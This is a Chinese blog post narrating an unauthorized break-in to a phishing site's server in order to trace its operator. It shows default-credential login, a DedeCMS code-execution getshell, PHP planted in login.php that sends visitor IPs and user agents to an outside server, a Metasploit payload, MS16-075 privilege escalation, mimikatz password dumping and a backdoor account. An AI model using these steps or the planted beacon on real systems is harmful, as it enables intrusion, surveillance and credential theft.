由小小姐炫耀引起的一次钓鱼网站入侵并溯源

信安之路

发布于 2019-04-09 11:21:49

3.9K1

发布于 2019-04-09 11:21:49

文章被收录于专栏：信安之路信安之路

本文作者：drivertom 原文地址：http://drivertom.blogspot.com/2019/03/blog-post_16.html

本文所写的内容基本真实，但有些渗透溯源的过程为了描述的精简被修改删除。一些无关紧要的事情也被略去，但对渗透至关重要的大思路和小细节我都没放过。同时在渗透的时候我没有留下截图，很多图是我后来补上的。转载请注明出处。

0x01 引子

事情要从一周前说起。

深夜，寝室，我照例空虚寂寞百无聊赖地刷群。

突然看到 D小姐姐在群里面说她用了 N 线程给钓鱼网站交了大量垃圾信息，最后卡爆了服务器，颇为得意。

当晚我正好闲着没事，就决定小小地得罪一下这个钓鱼网站，故事就这样开始了

0x02 入侵

首先是基础的信息搜集，但是当我查询 whois 和微步在线之后却没有任何结果，显示的是这些注册信息被保护了，毫无结果。最后只知道同一台服务器上运行了很多相同的钓鱼站。

好在 D小姐姐的垃圾数据并没有给服务器造成太大影响，很快服务器就恢复了并显示如下界面

现在的钓鱼网站的制作者都很良心，界面弄得跟官方的非常相似，可不像当年那些随便画个框框就等着要密码的，毕竟时代在进步嘛。但这也不是完美的，密码那里弄成小写 qq 的了。

翻看钓鱼网址：

http://timea.icu/Ru_op/newwap.html

的源码，我们可以看到作者用了 document.write(unescape(' 来掩饰网页源码，应该是用来防止被基于关键字拦截的防诈骗软件拦截？

而且网页里面还引用了个有趣的 JS

window.onload=function() {
    var date_time='2019-4-2 18:00:59';
   
   var time=Date.parse(newDate());
   var date1=Date.parse(newDate(date_time.replace(/-/g, '/')));
   if(date1<time) {
       top.location.href='/expire.html';
  };
  $('#expire-time').html(date_time);
};

大概就是一段时间后这个网站就 "expire" 掉了，而 expire.html 长这个样子。

这应该说明这个网站不是钓鱼者自己做的而是花钱买来的。现在不愧是社会主义市场经济啊，这些搞黑产的已经弄成一个产业链了，有的人负责做网站有的人负责骗，分工明确各司其职高效工作呢。

接着在检查没有 WAF 后就在登录处拦截 POST 包，扔到 sqlmap 里面注入

果真毫无意外地失败了。这年头，连钓鱼站都这么安全了。

我再用 Burp 扫了下路径，发现了几个有趣的路径。

这是我刚刚补的图，本来这些路径里面还有 phpmyadmin 的但是在后来管理员换了路径所以现在没了。我先尝试了 phpmyadmin 的弱密码，但是失败了，转去看别的路径

最有趣的是在 /membe r路径中

没想到这一个简简单单的钓鱼站需要用到一个 DedeCMS ?

我就顺手下了个 DedeCMS 的源码看看，发现后台路径 /dede，点进去居然有，而且直接用 admin/admin 就登录了！

后台别有洞天，皮肤比 Dede 官方的不知道好看到哪里去。如果 Dede 官方有人看到这个心里一定会很惭愧吧。后台还可以看到各种钓鱼数据，由于暂时它的后台出了些毛病我就不截图了。

不过不管这么说这只是套了层皮而已，内核还是 DedeCMS，我就在 SecWIKI 的 CMS Hunter 搜了个 DedeCMS 后台提权漏洞《DedeCMS V5.7 SP2后台存在代码执行漏洞》：

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS%20V5.7%20SP2%E5%90%8E%E5%8F%B0%E5%AD%98%E5%9C%A8%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E

,就成功 getshell 了

0x02 第一次不正经溯源

是时候把钓鱼者的IP弄出来了！

想想钓鱼者会怎么访问？当然是访问后台了！于是我在后台的 login.php 加上了如下代码来记录 IP

//检测安装目录完整性
function Check($url)
{
      $ch=curl_init();
      curl_setopt( $ch, CURLOPT_URL, $url);
      curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, 'GET');
      curl_setopt( $ch, CURLOPT_TIMEOUT, 60);
      $result=curl_exec( $ch);
      curl_close( $ch);
      return $result;
}
$url="http://...:/message.php?info=Another%20";
$info=urlencode((string)$_SERVER['REMOTE_ADDR'].(string)$_SERVER['HTTP_USER_AGENT']);
Check($url.$info);

其中这个接收的服务器是拿S神的服务器干的，他为了检测菜刀流量的行为专门搭建了个服务器供我们去日。

这样我在服务器上面访问/就可以看到 IP 了

可惜似乎我高兴得太早，一天下去发现登过这个后台的人遍布全国各地，估计是全国各地都有正义黑客想要干这个网站吧，但这样攻击者的 IP 就被藏起来了

看来我需要提权，进入服务器，拿到更多东西！

0x03 提权

在提权之前我还干了个事情，就是保存整站源码以查找关键信息免得一会万一动静太大或者搞崩服务器导致惊动管理员权限丢失我好歹能留点纪念品。

进入 webshell 发现命令执行的函数都被禁止了，首先要解决命令执行的问题。许多人认为命令执行函数被禁止就高枕无忧了，但接下来的事情证明这是错的。

禁止命令执行函数无非就是在 php.ini 里面设置 disable_functions，当我的 shell 能够修改这个 php.ini 的时候，这个所谓的防护就变得没有意义了。

执行 whoami 命令发现权限只有 iis apppool\www。这个权限低的难以忍受，我得想办法提权。我祭出了提权后渗透大杀器 Metasploit

上传用 msf 生成的木马，自己的服务器再配置好监听，webshell 执行，成功获取 meterpreter 会话！之后一记 Ms16-075 漏洞拿到 system 权限！

0x04 第二次正经的溯源

在拿到服务器权限后,我用 mimikatz 拿到了管理员明文密码

但是保险起见我还是先新建一个用户(就是上图的 360safe)，免得到时候登上去把管理员挤下去的尴尬状况

然后用一个命令把远程桌面的端口查出来

C:\Windows\system32>regquery"hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/v"PortNumber"
regquery"hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/v"PortNumber"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp
   PortNumber   REG_DWORD   0x58d4

最后成功登录远程桌面！